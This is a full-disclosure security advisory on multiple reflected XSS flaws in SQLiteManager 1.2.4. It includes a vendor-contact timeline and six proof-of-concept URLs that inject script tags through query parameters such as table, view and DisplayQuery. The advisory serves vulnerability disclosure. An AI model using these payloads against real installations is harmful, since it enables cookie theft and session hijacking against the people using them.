SQLiteManager 1.2.4: Multiple XSS
Date: 2015-10-07 15:58:36Update: This vulnerability was already present and known in the previous 1.2.0 version of SQLiteManager (CVE-2007-1231). The project is no longer maintained.
1. Introduction
| Affected Product: | SQLiteManager 1.2.4 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | sqlitemanager@gmail.com |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/01/2015 |
| Disclosed to public: | 10/07/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.
3. Proof of Concept
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view="><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=</textarea><script>alert(1)</script>
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'"><script>alert(1)</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 09/01/2015 | Informed Vendor about Issue (no reply) |
| 09/22/2015 | Reminded Vendor of disclosure date (no reply) |
| 10/07/2015 | Disclosed to public |